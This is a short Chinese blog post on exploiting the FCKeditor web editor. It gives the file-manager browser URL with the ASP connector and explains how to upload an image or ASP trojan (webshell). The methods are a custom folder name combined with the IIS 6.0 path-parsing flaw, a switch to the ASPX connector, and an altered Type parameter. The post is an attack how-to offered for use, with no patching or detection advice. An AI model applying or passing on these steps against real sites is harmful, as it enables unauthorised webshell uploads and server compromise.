fckeditor漏洞利用

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp 可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上...

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马。

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如:

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

  • 发表于 2021-04-05 11:24
  • 阅读 ( 236 )
  • 分类:互联网

0 条评论

请先 登录 后评论
大题小做
大题小做

691 篇文章

你可能感兴趣的文章

相关问题

网站首页 最近更新 点击排行 热门推荐